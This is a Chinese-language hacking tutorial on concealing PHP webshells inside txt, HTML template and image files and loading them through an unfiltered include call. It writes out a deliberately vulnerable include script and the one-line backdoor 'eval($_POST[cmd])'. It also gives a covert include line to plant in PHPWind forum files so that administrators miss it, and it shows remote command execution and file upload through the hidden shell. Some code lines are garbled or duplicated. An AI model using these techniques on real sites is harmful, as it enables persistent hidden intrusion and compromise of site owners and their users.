要知道如果光把 PHP 语句放到图片里是无论如何也不能执行的，因为 PHP 只解析扩展名为 php 的文件。所以说要能使隐藏在图片里的 PHP 语句执行。我们就的借助 PHP 中的调用函数 ：include 、require 等。

      我们还记得前些日子把木马隐藏到图片的文章吧。也就是在 PHP 文件里用 include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP 中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点 PHP 的人就不难发现可疑之处。由于 URL 里用 GET 方式很难传递参数，这就使得插入木马的性能得不到发挥。

      include 函数在 PHP 中使用的比较频繁，所以引起的安全问题也实在太多，例如 PHPWIND1.36的漏洞就是因为 include 后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到 PHP 文件中。然后把木马隐藏到图片或 HTML 文件里，可以说隐蔽性就更高了。如在 PHPWIND 论坛里插入下面的语句：＜‘’?@include includ/.$PHPWIND_ROOT;? ＜mailto:?@include 'includ/'.$PHPWIND_ROOT;?＞＞ 一般管理员是无法看出来的。

      有了include 函数来辅助帮忙我们就可以把 PHP 木马隐藏到 诸如 txt、html 和图片文件等很多类型的文件里来了。因为 txt、html 和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了，下面我们就依次来做测试。

      首先建立一 PHP 文件 test.php 文件内容为：

以下为引用的内容：
＜?php
$test=$_GET['test'];
@include 'test/'.$test;
?＞ 

      Txt 文件一般都是说明文件，所以我们把一句话木马放到目录的说明文件里就 OK 了。随便建立一个 TXT 文件 t.txt。我们把一句话木马＜?eval($_POST[cmd]);?＞粘贴到 t.txt 文件里。然后访问 http://localhost/test/test.php?test=../t.txt ＜http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt＞ 如果你看到 t.txt 的内容就证明 Ok 了， 然后把在 lanker 微型 PHP 后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt ＜http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt＞ 密码里添入 cmd 就可以了，执行返回的结果都可以看到。

      对于 HTML 的文件，一般都为模版文件。为了使插入到 HTML 的文件的木马能被调用执行而且不被显示出来，我们可以在 HTML 里加入一个隐藏属性的文本框 ，如：＜input type=hidden value="＜?eval($_POST[cmd]);?＞"＞ 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 ＜input type=hidden value="C:\Uniserver2_7s\www\test"＞ 我可以得到目录为 C:\Uniserver2_7s\www\test。

      下面我们说说图片文件，要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑，把＜?eval($_POST[cmd]);?＞插入到图片末尾。

      经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 ＜http://localhost/test/test.php?test=../1.jpg＞我们查看PHP环境变量 返回的是结果是原图片。

      这里可能要和我们想象的结果有些差距了，其实命令已经运行了，只是返回的结果看不到而已，因为这是真正的GIF文件，所以是不会显示返回结果的，为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料，文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果，那就拿出记事本伪造一个假的图片文件吧。

      到这里就基本测试完了，怎样隐蔽PHP后门就看你自己的选择了。